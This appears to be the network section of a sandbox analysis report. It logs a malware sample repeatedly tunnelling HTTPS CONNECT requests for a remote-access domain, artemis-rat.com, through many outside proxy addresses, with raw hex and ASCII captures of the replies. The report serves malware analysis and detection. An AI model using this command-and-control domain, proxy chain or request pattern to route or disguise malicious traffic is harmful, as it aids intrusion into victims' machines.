                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1575192.168.2.4548538.217.95.4488997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.473736048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1576192.168.2.45473245.124.184.13807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.474653959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.885802031 CET60INHTTP/1.0 200 Connection Established
                                              Proxy-agent: Apache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1577192.168.2.45294094.23.220.136292957284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.474653006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645071030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663378000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.663579941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.663077116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1578192.168.2.454852185.110.190.99807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.474761009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1579192.168.2.453023132.148.128.88293137284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.474880934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569595098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663360119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.757230043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.756840944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.756853104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1580192.168.2.454185184.170.245.14841457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.476608992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1581192.168.2.454868196.20.125.14580837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.477552891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1582192.168.2.454863180.250.159.4941537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.502727985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1583192.168.2.454762223.113.80.15890917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.512849092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.977406025 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1584192.168.2.454837182.93.69.7456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.517596960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1585192.168.2.453001161.97.170.82564277284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.517841101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569638968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663414001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.757355928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.756836891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1586192.168.2.45493435.72.118.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.518676996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.788161993 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:24.810565948 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee b4 b3 a0 ae 92 d9 4e a0 7c 63 62 80 23 08 ab 76 1a 3c 0e cc a2 2e d3 65 95 6d a4 23 1f 45 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: eN|cb#v<.em#E*,+0/$#('=<5/Uartemis-rat.com#
                                              Mar 11, 2024 08:37:25.079966068 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 f3 ea f6 d8 7b 81 e6 7d f2 c8 ce f0 b4 37 cc 2c 9f fe 80 69 c8 2f 6f 60 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9{}7,i/o`DOWNGRD0000*H010Uartemis-rat.com0240311071229Z260311071229Z010Uartemis-rat.com0"0*H0eVz
                                              Mar 11, 2024 08:37:25.260977983 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b6 3c ed fa 47 a5 69 99 b5 b3 10 6b a8 21 b3 9d 98 09 95 80 14 b8 a2 97 72 47 81 c2 c2 03 cc 43 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f0 94 d7 7f 62 da 20 80 1d 56 ed 34 60 55 22 12 fa 74 c9 eb 6e
                                              Data Ascii: %! <Gik!rGC(b V4`U"tn;B$!&
                                              Mar 11, 2024 08:37:25.532077074 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 69 93 c3 f4 26 9b 24 9c 6f 65 a4 c3 33 66 04 81 44 43 12 c9 c8 1a b0 7c 7c e8 8a c1 59 04 3d 51 e1 e2 78 c8 d1 a6 08 b9
                                              Data Ascii: (i&$oe3fDC||Y=Qx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1587192.168.2.454856124.163.236.5473027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.519359112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366332054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1588192.168.2.454920168.194.171.169997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.520196915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257026911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163568020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.897945881 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1589192.168.2.453068183.100.14.13480007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.523796082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645216942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663369894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.663585901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.663130999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.663095951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:05.937252998 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:38:05 GMT
                                              Server: Apache
                                              Content-Length: 534
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 68 65 6c 70 40 67 65 6e 69 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at help@geninetworks.com to inform them of the time this


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1590192.168.2.45307780.72.68.24780827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.523866892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.876768112 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1591192.168.2.45453691.107.180.250807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.525475025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.501243114 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1592192.168.2.45493966.45.246.19488887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.525595903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1593192.168.2.45490920.111.54.1681237284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.525825977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.822907925 CET319INHTTP/1.1 403 Forbidden
                                              Server: squid
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              X-Cache: MISS from cdn-fintech.info
                                              X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                              Connection: keep-alive
                                              Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                              Data Ascii: ERR_ACCESS_DENIED


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1594192.168.2.453029203.96.177.211121837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.526729107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645272970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1595192.168.2.454900120.78.191.68807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.528191090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.867903948 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 